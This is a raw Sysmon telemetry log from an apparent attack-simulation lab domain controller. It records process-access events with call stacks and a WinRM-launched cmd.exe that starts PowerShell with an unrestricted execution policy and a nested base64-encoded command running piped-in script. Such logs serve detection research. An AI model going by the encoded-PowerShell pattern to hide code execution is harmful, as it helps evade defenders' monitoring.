15:52:16.265{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003688Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.265{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003687Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.265{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CB0-5FA1-B800-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003686Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7CB0-5FA1-B700-000000008801}15681360C:\Windows\system32\cmd.exe{D28789B6-7CB0-5FA1-B800-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003685Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.264{D28789B6-7CB0-5FA1-B800-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CB0-5FA1-8346-070000000000}0x746830HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CB0-5FA1-B700-000000008801}1568C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000003684Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003683Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7CB0-5FA1-B600-000000008801}12524136C:\Windows\system32\conhost.exe{D28789B6-7CB0-5FA1-B700-000000008801}1568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003682Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003681Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003680Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003679Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003678Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003677Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003676Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003675Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003674Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003673Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CB0-5FA1-B700-000000008801}1568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003672Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7CB0-5FA1-B500-000000008801}17442548C:\Windows\system32\WinrsHost.exe{D28789B6-7CB0-5FA1-B700-000000008801}1568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x80000000000000003671Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.258{D28789B6-7CB0-5FA1-B700-000000008801}1568C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command 